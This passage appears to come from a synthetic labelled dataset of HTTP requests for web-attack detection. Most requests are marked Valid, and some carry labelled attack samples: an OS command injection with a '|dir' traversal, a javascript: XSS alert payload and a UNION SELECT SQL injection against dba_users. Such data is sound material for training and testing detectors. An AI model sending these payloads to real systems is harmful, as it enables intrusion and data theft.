If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest username="ixSSh"
Authorization: ldd6d2 otenttr=Eheu4
Range: 9092-,513-7
Referer: http://lql9ied.st/atm0hc4/2mT7s/tnmdn.dll
TE: deflate
Trailer: Accept-Charset
User-Agent: hhAetkhghtt
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 780x3609
Via: 1.7 20.8.158.80:8
Transfer-Encoding: compress
Upgrade: aao1rt/4.8, oho4/0.3, ln3tas/2.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12717
Start - Id: 42901
class: OsCommanding
GET /h6Um0Jr/DV2frommASb3inputoptIscript13/nxKQJwd0EyBU2s/sQVyQu/eLebefmeNfeAi17gstax/uToW9cTnAj0Xx/jwnnaj/4eWY./trl/0nWlKPhOy/iiP61H9xKl8hf_E817gN/o7nTatco5ilete.php4?itatutto4ou=%7Cdir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&gdEoMy=aC+&nnkrlfmih1trSss=lOvJlbx&TVrYmRR2O.=sH%5Dio&0a3ut8nrsNtsiQa=a5ceTO&BtrcadneilB=l+&eatlgEsntsogc=659&thss4tdn=6873&r3onn8e=mnO%28n&sa=hNnTitsmhbste&fhnchOh0=hpfpHecaseQqoh&rii3oi=a66DL4ELeV&Gsfiei=hlediv&eodn=oeieh%5Ciowt8arohtpassnt HTTP/1.0
Host: 1.88.11.97
Connection: toesicnF
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: 
Accept-Language: anuh-drkosy;q=0.8, 0fhgNt-1L6ba;q=0.7
Cache-Control: max-stale
Client-ip: 93.245.80.9
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="4"
Date: Wed, 18 Jul 07 13:54:05 UTC
ETag: W/"AgkTXED.n5oFVon"
Expect: 100-continue
From: Osrmorba@tAdnt9t.st
If-Modified-Since: Mon, 27 Aug 07 23:11:13 GMT
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: *
If-None-Match: "pLniMe-yAxV60kf"
If-Range: Fri, 10 Dec 04 13:19:36 GMT
Max-Forwards: 5604
Pragma: oogudr='t1l'
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: tldlts hhoe5i9=etntdiI4
Range: -35,510946-8117,-846229
Referer: /idnp/qiniza/fsrdaRNw.sh
TE: trailers,trailers
User-Agent: Mozilla/6.1 (compatible; MSIE 4.3; Mac OS X; ntea)
UA-Disp: 2272,6803,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0586x7312
Via: 6.7 122.97.168.232, FTP/3.5 www.lor3.png, lolsdY/4.4 229.234.148.253
Transfer-Encoding: identity
X-Forwarded-For: 191.162.116.219
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42901
Start - Id: 7733
class: Valid
POST /u2/ihidta/nV@tnS/duagu0PFVE/ciPgevHvLZX/hntrittsteeug/lE8gpRmG5QEy/rv/VXoqCXOzid2bin/in.pl? HTTP/1.0
Content-Length: 265
Content-Language: oYci,ieyre,fSoemt
Content-Encoding: deflate
Content-Location: http://05OWwbz.ch/ta0asm4/ftftmiye.exe
Content-MD5: NGlBaW9lbmZkamxsdTFucg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Dec 04 13:47:10 CET
Last-Modified: Thu, 01 Jan 09 13:07:48 GMT
Host: www.witl.uk
Connection: yenaane
Accept: video/mpeg;q=0.2, image/*, image/*;q=0.2
Accept-Charset: x-mac-cyrillic, ks_c_5601-1987;q=0.9, isiri-3342, cp-936
Accept-Encoding: compress;q=0.4, gzip, identity;q=0.6, identity
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 50.182.15.254
Cookie: 07ei4NEsweer=%ir;ngeEe=426131;unenSfh=roowherenftf
Cookie2: $Version="3"
Date: Tue, 27 Nov 07 03:46:17 CET
ETag: "c2mKD4d0c9MOSWGDj_"
Expect: t1ore=csky;ciiont
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Thu, 26 Jul 07 23:22:23 GMT
If-Unmodified-Since: Thu, 31 Jul 08 16:20:52 GMT
If-Match: "z2nh.NJvyiGlfzs"
If-None-Match: "gBkOJnxL5ASmpj7"
If-Range: Sat, 28 May 05 07:18:22 CET
Max-Forwards: 9
MIME-Version: 4.6
Pragma: scXo='tfnEmB'
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: knepza oAlz=ghb9s
Range: 176685-
Referer: http://www.cnah.net/oteeccy/xegliK/dlbeebh/uswtsdt/9aey.jpg
TE: trailers,deflate
Trailer: Date
User-Agent: to1Ait (hc9zhTn5Z; iwKTj2v; 8wQnI09pN; nUEypSgF; aWL.vG5-Gw)
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 297x5012
Via: dso/3.7 www.hapIari.jpg, HTTP/2.7 41.118.175.174, 7.9 50.66.43.48:206
Transfer-Encoding: compress
Upgrade: kimait/9.7
Warning: 971 163.32.226.99 "htrnlqtiwt" "Mon, 11 Jul 05 14:29:24 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 259275091002
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c4=1061333&esEAeieee=tYd&ecugd9=bDYya&aehSuN=nbs0Ahl9asargketal&fhletencn=hiiw4aAlNb$aka&Ht0taxosv=?;s7knbre oiShaving&noeeodiwck='h&eseic3racco=sglEdotldltdRoOmT4&adoas3=880370&doCnn8ibreA=774&mdiiaietxutea=cnd&tlaaarbfrfOodaw=153006156&mintq4k3sdasHh8=089

End - Id: 7733
Start - Id: 9971
class: Valid
GET /ua2lhEn5hxf/Oci7Mmhbvoerel2bnoPi/uzcN1_pA/mAasqcdqmrG/9woasdEaCotNI5ox8/h4RU3plTemnetN.mspx?dep=nao&skiAogeiGwfn=heEetb&IdDiN=610&qrsEeurst=eN6etucRaldlen&oreoff6cOnrd=a751 HTTP/1.1
Host: 161.74.56.227
Connection: pTgun1th
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, windows-1257
Accept-Encoding: deflate, deflate;q=0.6, identity
Accept-Language: *
Cache-Control: min-fresh=955
Client-ip: 87.178.167.178
Cookie: eyodEiaomdMx=shLUbPAdE7@;w9teyecos=wjaHWUjCOAo5;7ivmr1uh=2986973675;8ein=ie;e4eoet7r6i0=43
Cookie2: $Version="5"
Date: Mon, 05 Jul 04 13:47:48 CET
ETag: "j1OgriGRt792lU3"
Expect: rhteamu
From: gaacps@toci.org
If-Modified-Since: Tue, 03 May 05 11:04:00 GMT
If-Unmodified-Since: Thu, 26 Jul 07 15:54:09 CET
If-Match: "aImShzvNPmrzCa48"
If-None-Match: "GUfhsq_@U.eW0Cr"
If-Range: Fri, 27 Feb 04 21:49:48 UTC
Max-Forwards: 6
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="aBlthht"
Range: -96
Referer: /bXdHevt/niohln.mspx
TE: trailers
Trailer: User-Agent
User-Agent: d9c2/7.3.9.9.1
UA-CPU: MIPS
UA-Disp: 5045,4361,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 596x007
Via: HTTP/7.9 www.oknKd.htm, 3.5 www.ryacg7F.htm:281
Transfer-Encoding: gzip
Upgrade: b2bhql/3.8
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 7198158285326670
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9971
Start - Id: 47985
class: XSS
GET /e34Sfk2U98/dwzPM4avlcZ4I73o@/DUltJ7rhIdoiamrhmbsm/lw-zwR5JBZwEMamp/lJ_2fD0ajizV_pMX/9raoj7relbzeasiea2.jpeg?@mpasswd10Wq-bodyMb=fetc&it0Urhuoe=%3Ca+href++++%3D+%22++javas%26%2399%3Bript%26%2335%3B%5Balert++%28%27LhaMed6dt%27%29%3B%5D+%22+%3E&pt4seO1noe=0&o36hiBbsjl=ts&xveinqo5=ldiqt HTTP/1.0
Host: 225.191.235.201
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.3, iso-8859-8-i;q=0.0, x-mac-hebrew
Accept-Encoding: *
Accept-Language: jtsydrt-s;q=0.9, sctfrhek-sroo;q=0.9
Cache-Control: max-stale
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Sun, 07 Aug 05 20:55:37 GMT
ETag: "bB6SVaQ0NFgpTlezIQ"
Expect: lFikdnif=fhohwa1
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Sat, 12 Aug 06 14:18:51 GMT
If-Unmodified-Since: Mon, 07 Aug 06 06:55:04 UTC
If-Match: *
If-None-Match: *
If-Range: "__-bVLs4Q0UXX1MT"
Max-Forwards: 3
MIME-Version: 8.2
Pragma: EagllIad='siAl'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic cTBzbzpoaW9scw==
Range: 147-9,-924229,1-59450
Referer: http://www.in4the.net/rnGkeHs/thmkohhn/st2r017s/u3csxtn.sh
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: eewyl/5.8
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: FTP/5.0 54.23.240.57, u8torl/5.1 21.169.15.46, FTP/5.9 www.eror.jpeg
Transfer-Encoding: gzip
Upgrade: ncS/0.9, oneft/1.4, g2ddat/1.2, wrNtr/6.4, r7ss/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47985
Start - Id: 34129
class: Valid
POST /uNI/hKiu9Gr./e6/oF.7update/fwkEtevoOroe/0adcuEnmYgeEiu/_meta@boot.ini/t2.php? HTTP/1.0
Content-Length: 107
Content-Language: sre4
Content-Encoding: deflate
Content-Location: http://oe9eoo.it/ecsttL/nEbh2/olahhko/etseehit/tiJr0.bin
Content-MD5: QXR1cHN6ZXRvenl1OGlsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Aug 09 22:17:41 GMT
Last-Modified: Sat, 09 Jul 05 13:45:47 UTC
Host: 250.108.15.16
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yae1-jpir;q=0.3, yatX-aa;q=0.7, eHscn-creseaee, hotslxt-5egrrie, 9-htr2
Cache-Control: max-age=341
Client-ip: 138.89.107.219
Cookie: 4eDs=286;Od2RjY.perlcHoa=tuzsR3ElewVfenapu
Cookie2: $Version="8"
Date: Wed, 17 Jun 09 19:55:45 UTC
ETag: "a5Vc5HpAHAdS6Kb3dE"
Expect: 100-continue
From: scezv@neE4B.fr
If-Modified-Since: Sat, 31 Mar 07 19:19:18 UTC
If-Unmodified-Since: Fri, 23 Oct 09 22:09:57 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Aug 06 20:43:44 GMT
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: ot1o thnbfS=d3eeuo
Authorization: Basic eG5tdzpuZXRiVGh2
Range: -500777,66-
Referer: /eeuco8/Odreyri.png
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: jet6hizoil/9.9.2
UA-CPU: MIPS
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 995x590
Via: 6.5 www.nytreq.htm, HTTP/0.4 www.rvevo.jpg:7096
Transfer-Encoding: identity
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 295 www.ocnotj.css "efnmenvtT" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vw7wj=1&yformeFk=0&epRn=tR&nctnr1Ot3hoe=536&rwoonoWsych=f&sEdnrEprohexhe=aY@AoT@IOM1.&wieiitt=fhtpasssa

End - Id: 34129
Start - Id: 7228
class: Valid
POST /ieueqt4RgN.html? HTTP/1.1
Content-Length: 138
Content-Language: bdse,sntt,islHv
Content-Encoding: deflate
Content-Location: /tmlEadea.exe
Content-MD5: ZnRjaWVzTmlzdGNvc3BzUg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Tue, 30 Mar 04 14:49:34 CET
Host: www.ceatrdupf.fr
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: x-mac-greek, windows-1251, windows-1255, x-mac-japanese, us-ascii;q=0.0
Accept-Encoding: deflate, compress;q=0.6, deflate, compress;q=0.5
Accept-Language: 5sed-Ksl, l-n3euss;q=0.1, dhebUe-0a;q=0.0, fireD-ooae1a, 2hd6t-oaybtl
Cache-Control: tRfO=ff8eu2t
Client-ip: 83.132.90.202
Cookie: TmY=09;Ao3t0rtnyt=f39r+;ircwssgndlnoied=cF3KgL09
Cookie2: $Version="340"
Date: Thu, 18 Sep 08 01:30:15 CET
ETag: W/"CXAljVW.aYONgno@TIm"
Expect: rri96osu
From: seKsui5@tneeaatdac.fr
If-Modified-Since: Thu, 15 Sep 05 05:28:16 GMT
If-Unmodified-Since: Fri, 17 Aug 07 21:43:48 CET
If-Match: *
If-None-Match: "XfVq3qNuQ9TJ7lqIs"
If-Range: Tue, 03 Nov 09 04:11:50 CET
Max-Forwards: 9
MIME-Version: 6.6
Pragma: S=olequu
Proxy-Authorization: Basic ZHV0dTpvUWR0U3o=
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: /tjheo/Sl3Af/rRrrsji.css
TE: trailers,trailers,chunked;q=0.3
Trailer: Range
User-Agent: 3s3rdr
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: HTTP/6.7 74.155.138.253:415, 4.5 140.140.169.177
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ym2t0d=4297661&ilb20err=pMHP-n.pAJ0&geeesllyen=wart9dditehotu&style4ZmJI_Xz=esu&dyr=nDwmEypnTXO&wrNx3hAnienejte=ovghfpaOray&Etnntisleze=Ox

End - Id: 7228
Start - Id: 17091
class: Valid
GET /tJkkPvXd3e/aoSkwr@iNx8X8rw7RqQH/h2DrgAfvo/0dGBi_hDu/mlelz1rlt2aete14au/txarl/naQDbOus-lJFlBt8onDR.aspx?aQn0OCobjectUunion.=828&oThncrdxso5nhtn=1&53einoT=e0v3&anwnmtit8ermoq=7&6ntVhgbt=dcx&oms96t76iwg=tqbtszmttmcsah&7eoDr=neg&tmtnlrSentdti=73352&M2jjSieserwuso=90524&tN=6.hg4r&syy=%3Ddeehn%7C%27oh HTTP/1.1
Host: 203.67.116.98
Connection: a77oenA
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=009
Client-ip: 53.27.195.117
Cookie: NntPsLhtpass8@n=3329212;UcwnJlibZ=7e
Cookie2: $Version="845"
Date: Thu, 29 Apr 04 19:11:57 CET
ETag: "HA9DQ3Ete4MaHJah"
Expect: apSs=phlfs2
From: mjsOfho@efDme.uk
If-Modified-Since: Tue, 28 Oct 08 24:24:08 GMT
If-Unmodified-Since: Sun, 22 Oct 06 07:47:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6672
MIME-Version: 1.6
Pragma: Aen='chtec'
Proxy-Authorization: Digest algorithm=m5e8e
Authorization: Basic ZXN0ZDpSbTdybG40
Range: 08-93302,07567-7
Referer: http://www.areTooee.gov/auguinal.mpeg
TE: trailers,gzip;q=0.2,chunked;q=0.8
Trailer: Accept
User-Agent: hGnOguU_ http://www.5x8aamE.st
UA-CPU: PowerPC
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: FTP/6.2 www.mdTr94e.css, 4.2 86.15.34.212, ses/7.9 252.25.86.114
Transfer-Encoding: deflate
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 087 www.lusFn.tiff "cRn1mwq" 
X-Forwarded-For: 6.180.151.78
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17091
Start - Id: 4229
class: Valid
PUT /hfYJvY.wX@/yrErttuqne9i/a1m/tF_u2yV2doEoN-66k.tu/clzojitaeaofaeig/mRhV8t-GZMCwe1nPlQ/v0Bti4lCa8dUu.sh? HTTP/1.1
Content-Length: 200
Content-Language: eflfwg,eAo1b,otsggs
Content-Encoding: identity
Content-Location: http://www.pfoko5em.it/e02sde/qeaef.jpg
Content-MD5: Nmplc2FsbnFFdW5jYVNpNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 04 12:12:11 GMT
Last-Modified: Wed, 10 Dec 08 07:52:57 UTC
Host: www.Hg6er3sidn.it:843
Connection: close
Accept: */*
Accept-Charset: cp-936, x-mac-greek;q=0.1, shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 184.148.250.255
Cookie: 4adminhavingwinnt=?m;smsSrvNreluo=rdts4t;rae7j4TebnLav=tdOwlpte
Cookie2: $Version="6"
Date: Sat, 11 Jun 05 01:16:28 CET
ETag: "DP4avm52xf@B639Ld4s"
Expect: 81eont
From: vr3pieee@taudgsrefW.org
If-Modified-Since: Thu, 07 Sep 06 24:24:03 CET
If-Unmodified-Since: Thu, 17 May 07 12:06:42 GMT
If-Match: *
If-None-Match: "m06Bg.oFLfEEnpoZo.lm"
If-Range: *
Max-Forwards: 1362
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM N2FvdGxtZGVpc3VodHRqdGxhNnpsNW5jYzFrZjFhaXRuYg==
Range: 936255-,7-,-5
Referer: http://feoapaan.st/iit4i/ytgean4/idstir/t5oeq6.txt
TE: chunked,trailers,gzip;q=0.8
Trailer: Range
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 9.0; UE-ci; rv:3.8.3) Gecko/03137684
UA-CPU: x86
UA-Disp: 9117,635,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0647x7057
Via: 8.3 237.148.228.18:90, 4.4 196.61.209.91
Transfer-Encoding: gzip
Upgrade: 5ck/7.3
Warning: 544 www.hni2dj.shtml:11 "OemiccOl" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 3720829433622
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

wra=aXiko&osamX8MH-p=aDPc_afGxN&qDTC0ezGfMPP=33552255&0Esdrdrescn=hrsioc9le3&thlwevn= T&i1tA8=57&ni_u=9387569&iofoithildsE=neconnectdwp- ogs22Qpa&ete=sah%dobm0(fkoe/haas&o4AotR2hosnoiod=83982232

End - Id: 4229
Start - Id: 26761
class: Valid
GET /eX1M/anrete/iBR9IIOtPQ6m0U/na6AltostecEf88l/Bbu8nN2.RHUBPLk/EwWEErpasswdHykVY/pi.js?tsor=replaceset+tteat%3E&seiNe=3&eaoodnt=-N%5Cca%5Dw%7Coptetfa%29axn&obardtdtwko=%5CpassthrurlofEi%3D+r&ph=mi7dobjectSwt6%3Cemla&M1gchildGuF_4X=r%24iS+nRhs4%26having&eam=699&QmcV.R=at HTTP/1.1
Host: 79.230.138.168
Connection: ldhaof
Accept: */*;q=0.1
Accept-Charset: x-mac-greek, us-ascii, x-mac-ce
Accept-Encoding: deflate;q=0.6
Accept-Language: sa-1Pw, 5-t;q=0.9
Cache-Control: min-fresh=0
Client-ip: 14.63.250.60
Cookie: F_access_logQRPUqP7W6=gkm2P8Ij-PFT;O3access_logVdVQ=eCbZ9cRcNp;JpdNletCFS=y 29q;nNeToe5=953;Raieodusx=ogEuZfS
Cookie2: $Version="552"
Date: Sat, 04 Jun 05 10:30:30 GMT
ETag: "u-mPDq26@3ohbVtt8y6A"
Expect: 100-continue
From: iihSr4@oeG8oe.be
If-Modified-Since: Sat, 06 May 06 10:18:42 GMT
If-Unmodified-Since: Thu, 19 Feb 09 22:22:46 UTC
If-Match: "CAH4PTSDdUkVNyov"
If-None-Match: "NAYr1_0ZP-LKyI2iTG"
If-Range: "-0v1gWwjQgtAVFE4BGE"
Max-Forwards: 93
MIME-Version: 7.6
Pragma: o=m
Proxy-Authorization: Basic c2xibnN3YWk6dHJsaWNyZQ==
Authorization: htwchh daoexb=ouir
Range: 56-
Referer: /svssaevn/atete/0eetsdOi.dll
TE: deflate,gzip
Trailer: Connection
User-Agent: qTe0qapCH http://www.ohmee0d.com
UA-CPU: 68000
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 358x270
Via: HTTP/1.0 www.anao.shtml
Transfer-Encoding: rfoen; rMcr=hEne
Upgrade: a4chr/1.0, scx4il/0.6
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26761
Start - Id: 17340
class: Valid
GET /fSgeAzyuJ/ineeisefrneh/ExHn.shtml?gsss=5549250 HTTP/1.1
Host: www.ohgto.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: 6='xu'
Client-ip: 192.213.242.232
Cookie: TlodhMpassthrup0SD=e= @hnymEo;atet=uEce;seoerepInddd=dsSQ;Ectai=eVed4u;OMncuaEsngl=nbsf
Cookie2: $Version="64"
Date: Mon, 08 Dec 08 18:57:07 CET
ETag: W/"XScZFc6C-ytK33GmOIxf"
Expect: 100-continue
From: atnl@pt6tqur.gov
If-Modified-Since: Tue, 29 Aug 06 19:46:43 CET
If-Unmodified-Since: Wed, 06 Jun 07 18:13:42 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Mar 05 07:23:45 UTC
Max-Forwards: 0
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: rwee nsio=oosT
Range: -891481,4-
Referer: http://ersl.de/be5nfae/iexo2asn/5pqng/texAoH.nsf
TE: deflate,trailers,deflate
Trailer: Range
User-Agent: Mozilla/8.7 (Windows; U; Win98 6.8; hb-ea; rv:2.9.5) Gecko/17242337
UA-CPU: 68000
UA-Disp: 7547,506,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 455x7663
Via: FTP/3.2 220.77.149.141:20835, elsTH/7.3 www.seratoEa.shtml, FTP/3.1 www.qpDbny.gif
Transfer-Encoding: deflate
Upgrade: hulh/0.2, aau/8.4, stan/1.1
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 69600
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17340
Start - Id: 16509
class: Valid
GET /e8xt/h0uViNqvw/Qexec/efG0Z7ULY/ritierprnz/eii1dkIbpltlTrhqxbnl/sdK05VE3uACgp/tcr8w/axeU2_XZkfGHUnEOP/tq5.bin? HTTP/1.0
Host: www.tarahIe.st:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: v='g2t'
Client-ip: 74.241.75.79
Cookie: l4k4zoh=80@sv1EF;Twa5oN=efa;decdt90=9
Cookie2: $Version="74"
Date: Thu, 05 Apr 07 21:04:39 CET
ETag: "Xun9jE_1fsF7tswH4F0X"
Expect: odss=htsSa
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 03 Nov 07 15:10:00 GMT
If-Unmodified-Since: Tue, 19 Dec 06 21:34:11 GMT
If-Match: "EtGaCdO0OLQLAaDX7gXW"
If-None-Match: *
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 552
MIME-Version: 0.2
Pragma: nswhA4l='t4a'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM cnR1bWQ5RW9oYW5lZWtwY25vdmVzbmllemhvc3duZXRQcnRuYWVpdG9l
Range: 90-3929,2123-,048886-
Referer: /DDd6/ethu/UbzThijm/gfudmllh.dll
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/5.3 (X11; U; Linux i386 7.3; i5-en; rv:2.9.7) Gecko/72063514
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 950x803
Via: 8bo/2.5 www.Naht.gif, HTTP/4.4 www.eiwR.css
Transfer-Encoding: identity
Upgrade: doc/7.0, ari/9.3, s1yrm/6.9
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 9917949
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16509
Start - Id: 42375
class: SqlInjection
GET /cE0a/a1z/njj/dCScUx7/ser/7eemprn/rWbin0us0W.asp?assGnojtro3m7sr=kd&aJ0unionKAalinkYgJT=2062&qntsateas=chairs%27++UNION+++++SELECT+nEyeit+FROM+++dba_users+WHERE++name++like+++%27%2525&yT=40957&Gb4gT7binO@oV=oqe HTTP/1.1
Host: 152.50.135.80
Connection: close
Accept: text/*, audio/x-wav;q=0.6, application/*
Accept-Charset: iso-8859-3;q=0.2, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 97.209.57.16
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="899"
Date: Wed, 25 Feb 04 20:35:46 GMT
ETag: "in9UnGe2VcAJ-eYe1"
Expect: Neatid
From: eudloA@r7hlle0nht.it
If-Modified-Since: Thu, 15 Oct 09 13:18:04 CET
If-Unmodified-Since: Wed, 09 Jun 04 15:10:16 CET
If-Match: "kjQCPW1Mv0dgApBYFX2@"
If-None-Match: "Nko6XW1G7fkK0lnL"
If-Range: Tue, 30 Sep 08 18:09:48 CET
Max-Forwards: 132
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: 2sre htostXhr=msilt
Range: -8375
Referer: /errratsh/oqrSht/yagor/torins.ace
TE: chunked,gzip,trailers
Trailer: Range
User-Agent: aslhdesch/1.9.1.2
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5585x643
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: compress
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 888 186.190.114.110 "ojtvy" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42375
Start - Id: 25357
class: Valid
GET /ois6ia06osaqtti8t/SVR/tIL6d.Qh1by1R3Xq9/e.E0hISMhZuuVsk0L/ntddocumentLhacceptV_/e9uTsQo.png?hfu6tZf7bcKt=29459&A4ELI@WOI=var%7Epn%5Dngroup+byfdiedlhttps&HVJIhSZbBwpa=-i+oRhtaccesclho%5Bne%29aoina&xltss88bmahnA=9108353&wibax=aeenosntit&node9XurcpbO_d%uaccept=6&cxrvpest=pntAjindae5nXta&eoYhLth8esanamE=184&fsae=kgErXe1opdf&aid9h5mn5ddEh=el3K&gjiaro3iwn=kimochah%3Ba8tLxterm HTTP/1.1
Host: 22.31.67.146
Connection: LhcKO
Accept: text/xml;q=0.1, text/xml;q=0.2, video/mpeg;q=0.5
Accept-Charset: iso-8859-9;q=0.6, euc-cn;q=0.0, iso-8859-9, iso-8859-3
Accept-Encoding: deflate, identity;q=0.2, compress, compress;q=0.1
Accept-Language: aOg3cu-h, tpto-gI2sr;q=0.4, rcdot-roo;q=0.9
Cache-Control: max-stale=472
Client-ip: 116.248.127.206
Cookie: esHi=eeutqaoib5ma;uje=8066;F2Di5n=o3%/e>sla;uiihssh8nehrent=iya
Cookie2: $Version="1"
Date: Sat, 29 Jan 05 03:53:33 CET
ETag: W/"H-nR_fhu2JQLg5Kk35B"
Expect: 100-continue
From: 5tiby@ird1trmU.net
If-Modified-Since: Mon, 05 Apr 04 14:18:28 CET
If-Unmodified-Since: Mon, 29 Dec 08 07:45:10 UTC
If-Match: *
